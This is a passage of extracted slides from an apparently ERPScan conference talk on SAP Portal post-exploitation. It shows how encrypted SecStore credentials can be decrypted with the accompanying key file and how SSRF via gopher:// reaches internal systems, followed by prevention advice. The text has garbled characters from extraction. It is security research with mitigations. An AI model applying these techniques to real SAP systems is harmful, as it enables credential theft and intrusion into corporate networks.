  • 63. SecStore.properEes   $internal/version=Ni4zFF4wMSeaseforCCMxegAfx   admin/host/TTT=7KJuOPPs/+u+14jM7uy7cy7exrZuYvevkSrPxwueur2445yxgBS   admin/password/TTT=7KJuOPPs/+uv+14j56vDc7M7v7dytbGbkgqDp +QD04b0Fh   jdbc/pool/TTT=7KJuOPPs/+u5jM6s1cvvgQ1gzFvarxuUzEJTHTJI0VGegH   admin/port/TTT=7KJuOPPs/+u+1j4vD1cv6ZTvd336rzEd7267Rwr4ZUgRTQ   $internal/check=BJRrz€eUA+bw4XCzdz16zX78u•t   $internal/mode=encrypted   admin/user/TTT=7KJuOPPs/+u+14j6s14sTxXU3ONl3rL6N7yssV75eC6/5S3E   63  
  • 64. config.properEes    rdbms.maximum_connec8ons=5   system.name=TTT   secstorefs.keyfile=/oracle/TTT/sapmnt/global/security/data/SecStore.key   secstorefs.secfile=/oracle/TTT/sapmnt/global/security/data/SecStore.proper8es   secstorefs.lib=/oracle/TTTsapmnt/global/security/lib   rdbms.driverLoca8on=/oracle/client/10x_64/instantclient/ojdbc14.jar   rdbms.connec8on=jdbc/pool/TTT   rdbms.ini8al_connec8ons=1   64  
  • 65. Get  the  password   •  We  have  an  encrypted  password   •  We  have  a  key  to  decrypt  it   We  got  the  J2EE  admin  and  JDBC  login:password!   65  
  • 66. PrevenEon   •   Install  SAP  note  1619539   •   Restrict  read  access  to  files  SecStore.properEes   and  SecStore.key   66  
  • 67. Portal  post  exploitaEon   •  Lot  of  links  to  other  systems  in  corporate  LAN   •  Using  SSRF,  aUackers  can  get  access  to  these  systems   What  is  SSRF?   67  
  • 68. SSRF  History:  Basics   •  We  send  Packet  A  to  Service  A   •  Service  A  ini8ates  Packet  B  to  service  B   •  Services  can  be  on  the  same  or  different  hosts   •  We  can  manipulate  some  fields  of  packet  B  within  packet  A   •  Various  SSRF  aUacks  depend  on  how  many  fields  we  can   control  on  packet  B     Packet  A   Packet  B   68  
  • 69. ParEal  Remote  SSRF:     HTTP  aeacks  on  other  services   HTTP  Server    Corporate   network   Direct  aUack      GET  /vuln.jsp     SSRF  AUack     SSRF  AUack     Get  /vuln.jst     A   B   69  
  • 70. Gopher  uri  scheme   •  Using  gopher://  uri  scheme,  it  is  possible  to  send  TCP  packets   –   Exploit  OS  vulnerabili8es   –   Exploit  old  SAP  applicaEon  vulnerabiliEes     –   Bypass  SAP  security  restric8ons   –   Exploit  vulnerabili8es  in  local  services     More  info  in  our  BH2012  presenta8on:   SSRF  vs.  Business  Cri>cal  Applica>ons   hUp://erpscan.com/wp-­‐content/uploads/2012/08/SSRF-­‐vs-­‐Businness-­‐cri8cal-­‐applica8ons-­‐ whitepaper.pdf   70  
  • 72. Conclusion   It  is  possible  to  protect  yourself  from  these  kinds  of  issues,     and  we  are  working  close  with  SAP  to  keep  customers  secure   It’s  all  in  your  hands   SAP  Guides   Regular  security  assessments   ABAP  code  review   Monitoring  technical  security   SegregaEon  of  DuEes   72  
  • 73. Future  work    Many  of  the  researched  issues  cannot  be  disclosed  now  because   of   our   good   rela>onship   with   SAP   Security   Response   Team,   whom   I   would   like   to   thank   for   coopera>on.   However,   if   you   want  to  be  the  first  to  see  new  aBacks  and  demos,  follow  us  at   @erpscan  and  aBend  future  presenta>ons:     •  November  9  –  POC  (Korea,  Seoul)   •  November  20  –  ZeroNights  (Russia,  Moscow)   •  November  29  –  DeepSEC  (Austria,  Vienna)           73  
  • 74.     74   Web:    www.erpscan.com   e-­‐mail:    info@erpscan.com   TwiBer:      @erpscan                @_chipik